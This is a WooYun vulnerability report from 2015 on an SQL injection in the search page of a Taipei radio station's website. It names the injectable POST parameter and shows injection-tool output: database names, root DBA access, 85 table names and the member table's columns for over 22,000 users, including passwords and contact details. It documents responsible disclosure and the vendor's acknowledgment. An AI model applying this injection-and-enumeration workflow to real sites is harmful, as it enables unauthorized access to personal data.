当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166016

漏洞标题:佳音廣播電台(台北FM90.9)www主站一处SQL漏洞泄露#85张表#DBA权限#2万多用户信息#用户名#密码#姓名#性别#生日#地址#电话#Email等(臺灣地區)

相关厂商:佳音廣播電台

漏洞作者: 路人甲

提交时间:2015-12-30 18:12

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

主站地址:

http://**.**.**.**/


在线收听:

http://**.**.**.**/live_goodnews_new.htm


听着感觉志玲姐姐在说话。。。好柔软。。。
漏洞地址:

http://**.**.**.**/search.php
POST:keyword=1&submit=%E9%80%81%E5%87%BA
参数:keyword


SQL-1.png


工具跑

SQL-2.png


5个库:

available databases [5]:
[*] choir
[*] goodnews
[*] information_schema
[*] mysql
[*] test


当前库信息:

SQL-3.png


current user:    'root@localhost'
current database:    'goodnews'
current user is DBA:    True


85张表:

SQL-5.png

Database: goodnews
[85 tables]
+--------------------------+
| admins                   |
| admins_log               |
| areacode                 |
| banner                   |
| banner_type              |
| broadcast                |
| broadcast_log            |
| common_label             |
| content                  |
| content_group            |
| content_group_hex        |
| content_keyword          |
| content_log_action       |
| content_log_factory      |
| content_log_library      |
| content_log_message      |
| content_log_music        |
| content_log_musicnews    |
| content_log_news         |
| content_log_program      |
| content_log_publish      |
| content_log_song         |
| content_log_story        |
| content_log_website      |
| content_top              |
| content_type_action      |
| content_type_common      |
| content_type_factory     |
| content_type_host        |
| content_type_magazine    |
| content_type_message     |
| content_type_music       |
| content_type_news        |
| content_type_program     |
| content_type_promotion   |
| content_type_publish     |
| content_type_story       |
| content_type_website     |
| epaper                   |
| epaper_order             |
| epaper_queue             |
| epaper_type              |
| faqs                     |
| faqs_type                |
| forum                    |
| forum_group              |
| forum_group_type         |
| forum_post               |
| forum_post_type          |
| forum_reply              |
| forum_vote               |
| host                     |
| host_log                 |
| library_member           |
| library_member_log       |
| library_music            |
| library_music_borrow     |
| library_music_borrow_log |
| library_music_expand_log |
| library_music_log        |
| library_music_song       |
| library_music_type       |
| live                     |
| marquee                  |
| marquee_log              |
| marquee_type             |
| member                   |
| member_country           |
| member_education         |
| member_identity          |
| member_interest          |
| member_log               |
| member_notice            |
| member_question          |
| member_religion          |
| member_response          |
| member_type              |
| menu_group               |
| repost_type              |
| security_images          |
| website                  |
| website_counter          |
| website_log_ccm          |
| website_log_classic      |
| website_type             |
+--------------------------+


22516条用户数据:

SQL-4.png


member表75个字段

Database: goodnews
Table: member
[75 columns]
+--------------------------------+--------------+
| Column                         | Type         |
+--------------------------------+--------------+
| id                             | int(10)      |
| member_account                 | varchar(25)  |
| member_action_notice           | int(5)       |
| member_address                 | varchar(250) |
| member_admin                   | varchar(120) |
| member_admin_update            | datetime     |
| member_answer                  | varchar(120) |
| member_areacode                | varchar(25)  |
| member_birthday                | varchar(25)  |
| member_birthday_month          | varchar(5)   |
| member_counter                 | int(10)      |
| member_country                 | int(5)       |
| member_education               | int(5)       |
| member_email                   | varchar(120) |
| member_emailchk                | int(1)       |
| member_epaper                  | int(1)       |
| member_fax                     | varchar(120) |
| member_flag                    | int(5)       |
| member_id                      | varchar(120) |
| member_identity                | int(5)       |
| member_interest                | int(5)       |
| member_level                   | varchar(25)  |
| member_manage_title            | varchar(120) |
| member_memo                    | text         |
| member_mobeil                  | varchar(120) |
| member_mobeil_country_areacode | varchar(120) |
| member_nickname                | varchar(120) |
| member_note                    | text         |
| member_order_counter           | int(10)      |
| member_order_update            | datetime     |
| member_password                | varchar(25)  |
| member_pincode                 | varchar(25)  |
| member_publish_order_magazine  | int(5)       |
| member_publish_order_paper     | int(5)       |
| member_question                | varchar(25)  |
| member_reg_date                | datetime     |
| member_reg_ip                  | varchar(120) |
| member_religion                | int(5)       |
| member_report_01               | int(5)       |
| member_send_address            | varchar(250) |
| member_send_areacode           | varchar(25)  |
| member_sex                     | int(1)       |
| member_sign                    | varchar(250) |
| member_status                  | int(1)       |
| member_tel                     | varchar(120) |
| member_tel_areacode            | varchar(120) |
| member_tel_country_areacode    | varchar(120) |
| member_title                   | varchar(120) |
| member_type_01                 | int(5)       |
| member_type_02                 | int(5)       |
| member_type_03                 | int(5)       |
| member_type_04                 | int(5)       |
| member_type_05                 | int(5)       |
| member_type_06                 | int(5)       |
| member_type_07                 | int(5)       |
| member_type_08                 | int(5)       |
| member_type_09                 | int(5)       |
| member_type_10                 | int(5)       |
| member_type_11                 | int(5)       |
| member_type_12                 | int(5)       |
| member_type_13                 | int(5)       |
| member_type_14                 | int(5)       |
| member_type_kind               | int(10)      |
| member_unit                    | varchar(250) |
| member_unit_ext                | varchar(25)  |
| member_unit_no                 | varchar(120) |
| member_unit_no_title           | varchar(120) |
| member_unit_tel                | varchar(120) |
| member_update                  | datetime     |
| members_birthday_month         | varchar(5)   |
| members_equip                  | varchar(200) |
| members_face                   | varchar(100) |
| members_face_height            | int(4)       |
| members_face_width             | int(4)       |
| members_useravatar             | varchar(10)  |
+--------------------------------+--------------+


dump几条数据做证明

SQL-6.png


整理一下:

SQL-7.png

SQL-8.png


DBA可跨库

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-31 03:34

厂商回复:

感謝通報

最新状态:

暂无